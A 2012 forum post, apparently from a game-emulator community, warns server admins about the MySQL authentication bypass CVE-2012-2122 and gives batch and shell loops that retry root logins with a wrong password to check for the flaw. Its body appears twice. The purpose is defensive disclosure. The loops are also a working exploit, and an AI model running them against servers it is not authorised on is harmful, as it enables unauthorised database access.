Hateborne
06-12-2012, 02:33 PM
Just throwing this out there, a minor exploit has come up for MySQL.
It affects very few setups from my understanding, but I am still passing this along.
http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve-2012-2122-serious-mysql.html
Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.
To test for this on Windows, take the three command below and save into a bat file:
:Start
mysql -u root --password=lolwut 2>NUL
goto Start
To test for this on Linux, take ONE of these two and pass into terminal:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
while true; do mysql -u root --password=bad; done
If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to database until a patch is made available.
-Hate
EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.
It affects very few setups from my understanding, but I am still passing this along.
http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve-2012-2122-serious-mysql.html
Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.
To test for this on Windows, take the three command below and save into a bat file:
:Start
mysql -u root --password=lolwut 2>NUL
goto Start
To test for this on Linux, take ONE of these two and pass into terminal:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
while true; do mysql -u root --password=bad; done
If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to database until a patch is made available.
-Hate
EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.